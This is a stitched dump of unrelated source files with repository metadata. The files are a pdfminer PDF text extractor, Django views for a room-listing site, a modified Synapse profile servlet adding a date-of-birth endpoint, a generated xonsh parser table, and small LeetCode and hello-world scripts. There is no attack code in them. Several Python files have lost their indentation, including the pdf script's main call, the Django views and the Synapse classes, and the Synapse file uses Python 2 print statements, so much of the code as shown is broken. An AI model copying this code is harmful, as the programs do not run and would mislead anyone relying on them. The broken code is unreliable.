bb19b100daf84b032c032f56af6dcd1dd83acbe3 | 3fce3e0706e7ccac209aaa924365f14eaf90d632 | /trs_pdf-txt.py | af0409e933e8ead5c5af2aaeb99271c97e26fed5 | [] | no_license | lwx-hnu/elervise | ccb545cc905d7c4523e5f9352afe8ec3fa8bf40b | aeed17158ec62fdee881181a90e5e2928a7b8d53 | refs/heads/main | 2023-01-31T15:21:43.461001 | 2020-12-18T09:35:31 | 2020-12-18T09:35:31 | 321,296,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | #!/usr/bin/env python
# encoding: utf-8
"""
@author: wugang
@software: PyCharm
@file: prase_pdf.py
@time: 2017/3/3 0003 11:16
"""
import sys
import importlib
import os
import time
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
from PyPDF2 import PdfFileReader, PdfFileWriter
path = r'C:\Users\ASUS\Desktop\1\Cheat_Sheets.pdf'
def parse():
    fp = open(path, 'rb')  # open in binary read mode
    # Build a PDF document parser from the file object
    parser = PDFParser(fp)
    # Create a PDF document
    doc = PDFDocument()
    # Connect the parser with the document object
    parser.set_document(doc)
    doc.set_parser(parser)
    # Provide the initialization password;
    # if there is no password, just pass an empty string
    doc.initialize()
    # Check whether the document allows text extraction; abort if it does not
    if not doc.is_extractable:
        raise PDFTextExtractionNotAllowed
    else:
        # Create a PDF resource manager to manage shared resources
        rsrcmgr = PDFResourceManager()
        # Create a PDF device object
        laparams = LAParams()
        device = PDFPageAggregator(rsrcmgr, laparams=laparams)
        # Create a PDF interpreter object
        interpreter = PDFPageInterpreter(rsrcmgr, device)
        # Iterate over the page list, handling one page's content per pass
        for page in doc.get_pages():  # doc.get_pages() returns the pages
            interpreter.process_page(page)
            # Fetch the LTPage object for this page
            layout = device.get_result()
            # layout is an LTPage object holding everything parsed from the
            # page: LTTextBox, LTFigure, LTImage, LTTextBoxHorizontal, etc.
            # To get the text, read the text attribute of those objects.
            for x in layout:
                if (isinstance(x, LTTextBoxHorizontal)):
                    with open(r'C:\Users\ASUS\Desktop\log\1.txt', 'a', encoding='utf-8') as f:
                        results = x.get_text()
                        print(results)
                        f.write(results + '\n')
if __name__ == '__main__':
parse()
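# Note: PDFDocument/initialize/get_pages is the old pdfminer interface. A
# minimal sketch of the same extraction with the maintained pdfminer.six
# fork, assuming it is installed:
#
#     from pdfminer.high_level import extract_text
#     print(extract_text(path))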
| [
"[email protected]"
] | |
a3cf65f973774762a7b991821f94923a6700c945 | 543ded96b4a146371453680d032aada2a6788430 | /home/views.py | 09f0ef663ba7fe2552d4172b2673c248f36ef172 | [] | no_license | mat0ccdeekk/cooabit_temp | 638c1ad739d1510ac90524273651fd8c8d7dd5ac | 18ff42eeb86c593686e120e724512840df555403 | refs/heads/master | 2023-01-01T15:46:50.787501 | 2020-10-26T22:11:51 | 2020-10-26T22:11:51 | 297,378,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,539 | py | from django.shortcuts import render, get_object_or_404, HttpResponseRedirect, HttpResponse, redirect
from django.views.generic.edit import CreateView
from .forms import CasaForm
from .mixins import StaffMixing
from .models import Casa
import time
import os
def CreaCasa(request, pk):
print("siamo ancora qua")
if request.method == "POST":
form_casa = CasaForm(request.POST, request.FILES)
print(form_casa)
if form_casa.is_valid():
folder = ""
tempo = ""
# folder += tempo
# print("tempo ",tempo)
# print("nome cartella", folder)
# folder = request.user.first_name+"_"+request.user.last_name
# tempo = time.ctime()
# settings.MEDIA_ROOT=os.path.join(os.path.dirname(BASE_DIR), 'media-serve/'+folder)
form_casa.save()
return HttpResponseRedirect("/")
else:
print("form_casa not valid")
print("view")
form_casa = CasaForm()
context = {"casa": form_casa}
return render(request, "home/crea_casa.html", context)
"""
def CreaCasa(request, pk):
print("siamo ancora qua")
if request.method == "POST":
print("vediamoooo",request.FILES)
form_gallery = GalleryForm(request.POST, request.FILES)
form_casa = CasaForm(request.POST)
print(form_gallery)
print(form_casa)
if form_casa.is_valid():
if form_gallery.is_valid():
newGallery = form_gallery.save(commit=False)
form_casa.gallery = newGallery
form_casa.save()
return HttpResponseRedirect("/")
else:
print("form_gallery not valid")
else:
print("form_casa not valid")
print("view")
form_gallery = GalleryForm()
form_casa = CasaForm()
context = {"casa": form_casa, "form_gallery": form_gallery}
return render(request, "home/crea_casa.html", context)
"""
def visualizzaCasa(request, pk):
    casa = get_object_or_404(Casa, pk=pk)
    prezzoStudente = 0
    if casa.prezzo > 0 and casa.postiTotali > 0:
        prezzoStudente = casa.prezzo / casa.postiTotali
via = ""
if casa.zona != "none":
via = via + casa.zona
if casa.via != "none":
via = casa.via
context = {"casa": casa, "prezzoStudente": prezzoStudente, "via": via}
return render(request, "detail-rooms.html", context)
def creaThunder(request, pk):
casa = get_object_or_404(Casa, pk=pk)
    # hi taliban, how are you??
    ## TODO: I'm fine
    # Placeholder response (an assumed stub, not the intended feature) so the
    # view at least returns something; the original body was left unfinished.
    return HttpResponse("creaThunder: not implemented yet")
| [
"[email protected]"
] | |
94b54af84eb8299af883d3194845985ab5a23e94 | 804e6c5df909db32b31679c11b0044c4cb9a1590 | /synapse/rest/client/v1/profile.py | 5fc365e04783b6b3277398d14828b2d56da9c665 | [] | no_license | Jd8111997/ChatClub | f50d6ec417ee68b3e4b5b3fc4cf42a74c94c9fc0 | 9e226325ea12e8c0c5a2f1db264642763e56b1c4 | refs/heads/master | 2020-07-30T11:15:08.677684 | 2019-09-22T14:56:22 | 2019-09-22T14:56:22 | 210,209,834 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,634 | py | # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This module contains REST servlets to do with profile: /profile/<paths> """
from twisted.internet import defer
from synapse.http.servlet import parse_json_object_from_request
from synapse.types import UserID
from synapse.types import RoomID
from .base import ClientV1RestServlet, client_path_patterns
class ProfileDisplaynameRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/displayname")
def __init__(self, hs):
super(ProfileDisplaynameRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
displayname = yield self.profile_handler.get_displayname(
user,
)
ret = {}
if displayname is not None:
ret["displayname"] = displayname
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request, allow_guest=True)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
try:
new_name = content["displayname"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_displayname(
user, requester, new_name, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
#--------------------for dob save-------------------------------------------------
class ProfileDobRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/dob")
def __init__(self, hs):
super(ProfileDobRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
dob = yield self.profile_handler.get_dob(
user,
)
print "---------------------In V1/profile.py -- ProfileDobRestServlet class-----------------------------------"
print "dob = ",dob
print "-------------------------------------------------------------------------------------------------------"
ret = {}
if dob is not None:
ret["dob"] = dob
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request, allow_guest=True)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
try:
new_dob = content["dob"]
except Exception:
defer.returnValue((400, "Unable to parse dob"))
yield self.profile_handler.set_dob(
user, requester, new_dob, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
#---------------------------------------------------------------
class ProfileAvatarURLRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/avatar_url")
def __init__(self, hs):
super(ProfileAvatarURLRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
avatar_url = yield self.profile_handler.get_avatar_url(
user,
)
ret = {}
if avatar_url is not None:
ret["avatar_url"] = avatar_url
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
try:
new_name = content["avatar_url"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_avatar_url(
user, requester, new_name, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
## Added by me
"""
class GroupAvatarURLRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<room_id>[^/]*)/room_icon_url")
def __init__(self, hs):
super(GroupAvatarURLRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, room_id):
room = RoomID.from_string(room_id)
avatar_url = yield self.profile_handler.get_room_avatar_url(
room,
)
ret = {}
if avatar_url is not None:
ret["room_icon_url"] = avatar_url
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, room_id):
requester = yield self.auth.get_user_by_req(request)
room = RoomID.from_string(room_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
new_avatar_url = content["group_avatar_url"];
try:
new_name = content["room_icon_url"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_room_avatar_url(
room, requester, new_avatar_url, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
##--------------------
"""
class ProfileRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)")
def __init__(self, hs):
super(ProfileRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
displayname = yield self.profile_handler.get_displayname(
user,
)
avatar_url = yield self.profile_handler.get_avatar_url(
user,
)
dob = yield self.profile_handler.get_dob(
user,
)
ret = {}
if displayname is not None:
ret["displayname"] = displayname
if avatar_url is not None:
ret["avatar_url"] = avatar_url
if dob is not None:
ret["dob"]=dob
defer.returnValue((200, ret))
def register_servlets(hs, http_server):
    ProfileDisplaynameRestServlet(hs).register(http_server)
    ProfileDobRestServlet(hs).register(http_server)
    ProfileAvatarURLRestServlet(hs).register(http_server)
    ProfileRestServlet(hs).register(http_server)
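# Sketch of the resulting REST surface (paths taken from the PATTERNS above;
# response bodies mirror the dicts built in the on_GET handlers):
#   GET /profile/{user_id}/displayname -> {"displayname": ...}
#   GET /profile/{user_id}/avatar_url  -> {"avatar_url": ...}
#   GET /profile/{user_id}/dob         -> {"dob": ...}
#   GET /profile/{user_id}             -> combined displayname/avatar_url/dob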
| [
"[email protected]"
] | |
b3410046e6683bae3734e6383a0fea492bc46cbb | 3cefe15ca5f86c8ee805074200e73036e032c4da | /xonsh/completion_parser_table.py | 2175c647fefc98891803626c904bb93f259dba36 | [
"BSD-2-Clause"
] | permissive | ryanhuanli/xonsh | 3a61e447521e144471d3e76b893478a9fcfd0f92 | 1845fa007cb8f3ecb02a4fb17c15a44f11ebe6a3 | refs/heads/main | 2023-05-09T16:26:19.147372 | 2021-06-15T04:31:12 | 2021-06-15T04:31:12 | 375,830,694 | 0 | 0 | NOASSERTION | 2021-06-10T21:07:35 | 2021-06-10T21:07:34 | null | UTF-8 | Python | false | false | 9,170 | py |
# completion_parser_table.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AND ANY ATDOLLAR_LPAREN AT_LPAREN BANG_LBRACKET BANG_LPAREN DOLLAR_LBRACKET DOLLAR_LPAREN NEWLINE OR PIPE RBRACKET RPAREN SEMI STRINGcontext : command\n | commands\n command : args\n |\n commands : commandcommands : commands PIPE command\n\t| commands NEWLINE command\n\t| commands OR command\n\t| commands SEMI command\n\t| commands AND commandsub_expression : DOLLAR_LPAREN commands RPAREN\n\t| BANG_LPAREN commands RPAREN\n\t| ATDOLLAR_LPAREN commands RPAREN\n\t| DOLLAR_LBRACKET commands RBRACKET\n\t| BANG_LBRACKET commands RBRACKET\n\t| AT_LPAREN commands RPAREN\n | DOLLAR_LPAREN commands\n\t| BANG_LPAREN commands\n\t| ATDOLLAR_LPAREN commands\n\t| DOLLAR_LBRACKET commands\n\t| BANG_LBRACKET commands\n\t| AT_LPAREN commands\n arg : sub_expressionarg : DOLLAR_LPAREN\n\t| STRING\n\t| BANG_LPAREN\n\t| DOLLAR_LBRACKET\n\t| BANG_LBRACKET\n\t| ATDOLLAR_LPAREN\n\t| ANY\n\t| AT_LPARENargs : argargs : args arg'
_lr_action_items = {'$end':([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,0,-1,-2,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'PIPE':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,15,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,15,-5,15,15,15,15,15,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'NEWLINE':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,16,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,16,-5,16,16,16,16,16,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'OR':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,17,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,17,-5,17,17,17,17,17,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'SEMI':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,18,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,18,-5,18,18,18,18,18,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'AND':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,19,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,19,-5,19,19,19,19,19,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'DOLLAR_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[7,7,-32,-23,7,-25,7,7,7,7,-30,7,7,7,7,7,7,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'STRING':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[8,8,-32,-23,8,-25,8,8,8,8,-30,8,8,8,8,8,8,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'BANG_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[9,9,-32,-23,9,-25,9,9,9,9,-30,9,9,9,9,9,9,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'DOLLAR_LBRACKET':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[10,10,-32,-23,10,-25,10,10,10,10,-30,10,10,10,10,10,10,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'BANG_LBRACKET':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[11,11,-32,-23,11,-25,11,11,11,11,-30,11,11,11,11,11,11,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'ATDOLLAR_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[12,12,-32,-23,12,-25,12,12,12,12,-30,12,12,12,12,12,12,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'ANY':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[13,13,-32,-23,13,-25,13,13,13,13,-30,13,13,13,13,13,13,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'AT_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[14,14,-32,-23,14,-25,14,14,14,14,-30,14,14,14,14,14,14,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'RPAREN':([4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3
5,36,37,38,],[-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,33,-5,34,-20,-21,37,38,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'RBRACKET':([4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,-17,-5,-18,35,36,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'context':([0,],[1,]),'command':([0,7,9,10,11,12,14,15,16,17,18,19,],[2,22,22,22,22,22,22,28,29,30,31,32,]),'commands':([0,7,9,10,11,12,14,],[3,21,23,24,25,26,27,]),'args':([0,7,9,10,11,12,14,15,16,17,18,19,],[4,4,4,4,4,4,4,4,4,4,4,4,]),'arg':([0,4,7,9,10,11,12,14,15,16,17,18,19,],[5,20,5,5,5,5,5,5,5,5,5,5,5,]),'sub_expression':([0,4,7,9,10,11,12,14,15,16,17,18,19,],[6,6,6,6,6,6,6,6,6,6,6,6,6,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> context","S'",1,None,None,None),
('context -> command','context',1,'p_context_command','completion_context.py',463),
('context -> commands','context',1,'p_context_command','completion_context.py',464),
('command -> args','command',1,'p_command','completion_context.py',504),
('command -> <empty>','command',0,'p_command','completion_context.py',505),
('commands -> command','commands',1,'p_multiple_commands_first','completion_context.py',543),
('commands -> commands PIPE command','commands',3,'p_multiple_commands_many','completion_context.py',553),
('commands -> commands NEWLINE command','commands',3,'p_multiple_commands_many','completion_context.py',554),
('commands -> commands OR command','commands',3,'p_multiple_commands_many','completion_context.py',555),
('commands -> commands SEMI command','commands',3,'p_multiple_commands_many','completion_context.py',556),
('commands -> commands AND command','commands',3,'p_multiple_commands_many','completion_context.py',557),
('sub_expression -> DOLLAR_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',586),
('sub_expression -> BANG_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',587),
('sub_expression -> ATDOLLAR_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',588),
('sub_expression -> DOLLAR_LBRACKET commands RBRACKET','sub_expression',3,'p_sub_expression','completion_context.py',589),
('sub_expression -> BANG_LBRACKET commands RBRACKET','sub_expression',3,'p_sub_expression','completion_context.py',590),
('sub_expression -> AT_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',591),
('sub_expression -> DOLLAR_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',592),
('sub_expression -> BANG_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',593),
('sub_expression -> ATDOLLAR_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',594),
('sub_expression -> DOLLAR_LBRACKET commands','sub_expression',2,'p_sub_expression','completion_context.py',595),
('sub_expression -> BANG_LBRACKET commands','sub_expression',2,'p_sub_expression','completion_context.py',596),
('sub_expression -> AT_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',597),
('arg -> sub_expression','arg',1,'p_sub_expression_arg','completion_context.py',666),
('arg -> DOLLAR_LPAREN','arg',1,'p_any_token_arg','completion_context.py',670),
('arg -> STRING','arg',1,'p_any_token_arg','completion_context.py',671),
('arg -> BANG_LPAREN','arg',1,'p_any_token_arg','completion_context.py',672),
('arg -> DOLLAR_LBRACKET','arg',1,'p_any_token_arg','completion_context.py',673),
('arg -> BANG_LBRACKET','arg',1,'p_any_token_arg','completion_context.py',674),
('arg -> ATDOLLAR_LPAREN','arg',1,'p_any_token_arg','completion_context.py',675),
('arg -> ANY','arg',1,'p_any_token_arg','completion_context.py',676),
('arg -> AT_LPAREN','arg',1,'p_any_token_arg','completion_context.py',677),
('args -> arg','args',1,'p_args_first','completion_context.py',688),
('args -> args arg','args',2,'p_args_many','completion_context.py',693),
]
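# Reader's note (not part of the generated output): these tables are PLY's
# serialized LALR(1) machine -- _lr_action maps (state, token) pairs to
# shift/reduce actions, _lr_goto maps (state, nonterminal) to successor
# states, and _lr_productions lists the grammar rules the reducer dispatches
# on.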
| [
"[email protected]"
] | |
00809145f82c17507b7b70177cd32aff00ea4b01 | bd3c44a811a270e81c5b1d48e0f0172f3ab90054 | /simple_functions.py | 957667ebf53c0267f4f88660bbdf309d5b9de187 | [] | no_license | ycai01/open_source_proj | 6816e3eb49525f6218d0c7be299e4d09ed224617 | 342f459eaf03992711358bb3166870dfbf76635c | refs/heads/master | 2023-03-23T09:46:20.578910 | 2021-03-21T22:10:14 | 2021-03-21T22:10:14 | 350,093,881 | 0 | 1 | null | 2021-03-21T22:48:58 | 2021-03-21T19:08:53 | Python | UTF-8 | Python | false | false | 70 | py | def main():
print("Hello")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
893f3e005d90c7bf5010bd6b58490fe895f6c0cc | a0a7a6e62daa59a819665482f8b48b19fcb93d4d | /leetcode_415.py | a1a1dd875479afa9f5300664e1172e3fc0fe8368 | [] | no_license | boboalex/LeetcodeExercise | 1934bc190c7dda55e0e5a9ff6a7523535186fb75 | c29d217605cfcc8294855e3948acf744c941bf27 | refs/heads/master | 2023-04-19T10:13:30.261039 | 2021-04-23T06:33:38 | 2021-04-23T06:37:35 | 360,785,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | class Solution:
def addStrings(self, num1: str, num2: str) -> str:
i, j = len(num1) - 1, len(num2) - 1
carry = 0
res = ""
while i >= 0 or j >= 0:
a = int(num1[i]) if i >= 0 else 0
b = int(num2[j]) if j >= 0 else 0
            total = a + b + carry  # avoid shadowing the builtin sum()
            res = str(total % 10) + res
            carry = 1 if total > 9 else 0
i -= 1
j -= 1
if carry == 1:
res = "1" + res
return res
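# The loop consumes one digit per iteration from the least-significant end and
# carries into the next column, so it runs in O(max(len(num1), len(num2)))
# time with O(1) state besides the result string; e.g.
# Solution().addStrings("96043", "5582") returns "101625".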
if __name__ == '__main__':
s = Solution()
res = s.addStrings("96043", "5582")
print(res) | [
"[email protected]"
] | |
58ed71a22e4d7afc540b77b127a637084478af10 | a481439449a1f299f22eeeb384ad1a542ac3280f | /app/__init__.py | bed4e90c71a19966fa7a18fe2322716ab0fa1774 | [] | no_license | FranH20/EmpresasTacna | 945bc20aa9a6ff34ab2ee3d23234607015f2d752 | d1916dbe81577a6e77e5ef4e4d27f74f9eab6a8d | refs/heads/master | 2023-07-18T01:57:06.044866 | 2021-08-24T23:43:55 | 2021-08-24T23:43:55 | 397,488,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from flask import Flask, app
from .config import MONGO_URI
def create_app():
app = Flask(__name__)
app.config["MONGO_URI"] = MONGO_URI
return app
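# Hedged usage sketch (the file name run.py is illustrative, not part of this
# repo):
#
#     # run.py
#     from app import create_app
#     app = create_app()
#     if __name__ == "__main__":
#         app.run()
#
# Note that ``app`` imported from flask above is unused; only Flask and
# MONGO_URI are needed by this factory.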
| [
"[email protected]"
] | |
4149b8e5289cf89b858d9f0f30c0cbccdc5efe87 | 8364e4d23191ee535c163debffafa8418d705843 | /test/test_v1_endpoint_port.py | 691643b0d17b6094b4f7d7bd22cac4482b2aa588 | [
"Apache-2.0"
] | permissive | olitheolix/aiokubernetes | 2bb6499030e2e6e9b7ca0db63c4441293d70a09b | 266718b210dff2a9b2212183261ea89adf89115e | refs/heads/master | 2020-03-21T23:02:30.484410 | 2018-10-20T19:33:01 | 2018-10-22T05:52:42 | 139,162,905 | 28 | 3 | Apache-2.0 | 2018-10-22T05:52:51 | 2018-06-29T15:02:59 | Python | UTF-8 | Python | false | false | 932 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import aiokubernetes
from aiokubernetes.models.v1_endpoint_port import V1EndpointPort # noqa: E501
from aiokubernetes.rest import ApiException
class TestV1EndpointPort(unittest.TestCase):
"""V1EndpointPort unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1EndpointPort(self):
"""Test V1EndpointPort"""
# FIXME: construct object with mandatory attributes with example values
# model = aiokubernetes.models.v1_endpoint_port.V1EndpointPort() # noqa: E501
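        # A hedged sketch of what the FIXME asks for -- field names follow the
        # Kubernetes EndpointPort schema (port is required; name and protocol
        # are optional), but check the generated model before relying on them:
        # model = V1EndpointPort(port=80, protocol="TCP", name="http")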
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
7e908057e33cd135999895049c04d6dabc1c721c | 91b0b09d2c05e44f40e570a6323801d1f41bc60a | /graphs/largest_distance_between_nodes.py | 5bfaf511a46532c5d5d932c0a0f0297801d5faa3 | [] | no_license | shiveshsky/datastructures | 170243edbdaf1b206713bd3b53a029f32063d4ce | 22fb94983846c4e7906a22f91ef7c0886c74a6b6 | refs/heads/master | 2021-05-21T16:46:43.852404 | 2020-07-17T02:29:48 | 2020-07-17T02:29:48 | 252,722,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | import heapq
class Solution:
# @param A : list of integers
# @return an integer
def solve(self, A):
children = {}
root = None
for i, x in enumerate(A):
if x == -1:
root = i
else:
if x in children:
children[x] += [i]
else:
children[x] = [i]
largest_dist = 0
for k, v in self.dfs(root, children, 0, {}).items():
largest_dist = max(self.largest_dist_from_paths(v), largest_dist)
return largest_dist
def largest_dist_from_paths(self, paths):
paths += [0, 0]
a, b = heapq.heappop(paths), heapq.heappop(paths)
return -1 * (a + b)
def dfs(self, root, children, path_len, paths):
paths[root] = [0]
if root not in children: return paths
for child in children[root]:
paths = self.dfs(child, children, path_len + 1, paths)
heapq.heappush(paths[root], min(paths[child]) - 1)
return paths
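# How the pieces fit (derived from the code above): dfs stores, for every
# node, a min-heap of negated subtree depths; largest_dist_from_paths pads
# the heap with two zeros and pops the two smallest (i.e. deepest) entries,
# so their negated sum is the longest path through that node. For
# A = [-1, 0, 0] the root's heap is [0, -1, -1] and solve returns 2.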
if __name__ == '__main__':
print(Solution().solve([-1, 0, 0]))
| [
"[email protected]"
] | |
